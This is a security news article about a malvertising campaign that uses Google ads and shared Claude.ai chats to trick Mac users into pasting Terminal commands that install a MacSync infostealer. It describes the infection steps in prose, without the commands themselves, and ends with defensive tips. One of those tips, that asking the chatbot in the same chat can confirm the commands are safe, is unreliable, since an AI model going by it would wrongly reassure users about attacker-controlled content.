Claude.ai Chats Hijacked to Push Dangerous Mac Malware

A fresh malvertising attack is turning Anthropic’s own Claude.ai platform into a delivery channel for Mac malware. Hackers are buying Google sponsored ads that point to real claude.ai links, then luring users into pasting Terminal commands that quietly steal passwords, cookies, and Keychain data. Security researchers say the trick is working because nothing on the page looks fake.

How the Claude.ai malvertising attack works

Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign, and users searching for “Claude mac download” may come across sponsored search results that list claude.ai as the target website, but lead to instructions that install malware on their Mac.

The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. Albayrak identified a Claude.ai shared chat that presents itself as an official “Claude Code on Mac” installation guide, attributed to “Apple Support.”

The chat walks users through opening Terminal and pasting a command, which silently downloads and runs malware on their Mac. While attempting to verify Albayrak’s findings, BleepingComputer landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure.

Why this attack is harder to spot

Most malvertising tricks rely on lookalike domains. This one does not. This campaign flips that, as there is no fake domain to spot. Both Google ads seen here point to Anthropic’s real domain, claude.ai, since the attackers are hosting their malicious instructions inside Claude’s own shared chat feature.

That single design choice is the campaign’s secret weapon. For most users, a page living on claude.ai looks indistinguishable from an official Claude page, which makes confusion not just possible, but likely. The disclaimer that the content is user-generated is placed at the top of the page in small, barely visible print, making it easy for less inquisitive users to miss. Moreover, the disclaimer is not visible at all when the page is viewed on a phone.

“This was not just a clever attack. It was a systemic failure across multiple layers: advertising review, platform moderation, and trust signaling.”

What the macOS malware actually does

The terminal command kicks off a quiet, multi-step infection. Before proceeding further, the script also collects the victim’s external IP address, hostname, OS version, and keyboard locale, sending all of it back to the attacker. This kind of victim profiling before payload delivery suggests the operators are being selective about who they target.

Then the real damage starts. The script pulls down a second-stage payload and runs it through osascript, macOS’s built-in scripting engine. This gives the attacker remote code execution without ever dropping a traditional application or binary.

It harvests browser credentials, cookies, and macOS Keychain contents, packages them up, and exfiltrates them to the attacker’s server. Albayrak identified this as a variant of the MacSync macOS infostealer.

Quick look at the two variants observed in the wild:

The second variant is particularly stealthy. The payload uses encoded shell scripts and polymorphic delivery to evade detection. Every download serves a slightly different file, so antivirus tools cannot rely on a single fingerprint to catch it.

A growing pattern of AI platform abuse

This is not a one-off incident. Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries, and at least two variants of the malicious activity have been observed in the wild, with more than 10,000 users having accessed the content with dangerous instructions.

It is not the first time that attackers have abused AI platform shared chats this way. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users.

Researchers say the same crew may be cycling through AI brands. Over the past several months, threat actors have increasingly exploited the popularity of AI tools to distribute malware through fake download pages. Claude, Anthropic’s AI assistant, has been a recurring target. Previous campaigns primarily focused on macOS users, delivering stealers such as AMOS, MacSync, and DigitStealer through convincing impersonation sites.

What Mac users should do right now

The fix is simple, but it demands a small habit change. Users should download Claude only through official Anthropic pages and documentation. Mac users should also avoid pasting Terminal commands from shared chats, search ads, forums, or unknown setup guides.

Skip the sponsored results entirely. Users should navigate directly to claude.ai for downloading the native Claude app, rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic’s official documentation and does not require pasting commands from a chat interface.

There is also one neat self-defence trick. As Kaspersky researchers noted in the past, asking the chatbot in the same conversation about the safety of the provided commands is a straightforward way to determine if they’re safe or not.

Key safety tips at a glance:

• Type claude.ai by hand. Never trust the first sponsored result.
• Treat every Terminal command from the internet as hostile until proven safe.
• Check the page for the small “user generated” warning on shared Claude chats.
• If a guide claims to be from “Apple Support,” verify it on apple.com first.
• Rotate browser passwords and clear Keychain entries if you ran a suspicious command.

It is good practice to generally treat any instructions asking you to paste terminal commands with caution, regardless of where those instructions appear to come from. BleepingComputer reached out to Anthropic and Google for comment prior to publishing.

The bigger lesson here is uncomfortable. The web’s most trusted brands, the green padlock, and even the right domain in the address bar are no longer enough to keep you safe when attackers can rent space inside the platforms we trust. Curiosity about AI is at an all time high, and that is exactly what these criminals are counting on. Stay sceptical, slow down before pasting anything, and protect your Mac like it holds your whole digital life, because it probably does. Have you spotted suspicious Claude or ChatGPT links in your search results lately? Drop your experience in the comments and share this warning with friends using #ClaudeMalware and #MacSync so more people can stay safe.